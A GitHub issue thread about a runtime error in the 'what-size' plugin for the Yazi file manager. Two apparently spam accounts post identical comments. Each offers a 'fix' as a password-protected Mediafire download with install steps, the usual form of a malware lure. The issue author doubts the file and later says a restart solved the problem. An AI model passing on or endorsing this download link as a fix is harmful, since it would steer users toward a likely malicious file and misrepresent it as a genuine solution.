### ISSUE TITLE
Getting error on Yazi v0.3.2

### ISSUE THREAD

**Issue by shauryagoel** [pirafrank/what-size.yazi#2]
I am using yazi v0.3.2 and triggering the shortcut of the `what-size` plugin, I get the following error-
```
Micro plugin failed:
runtime error: [string "what-size"]:27: attempt to index a nil value (local 'last_line')
stack traceback:
        [string "what-size"]:27: in upvalue 'get_total_size'
        [string "what-size"]:56: in function <[string "what-size"]:46>
```

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by shauryagoel** [comment]
@rickdoq @KrissV2 can you share the link to the other issue? Also, it would be better if you post the changes required (maybe in a diff patch format) rather than having to download a (possibly malicious) file.

**Comment by shauryagoel** [comment]
Restarting my PC solved the issue somehow.
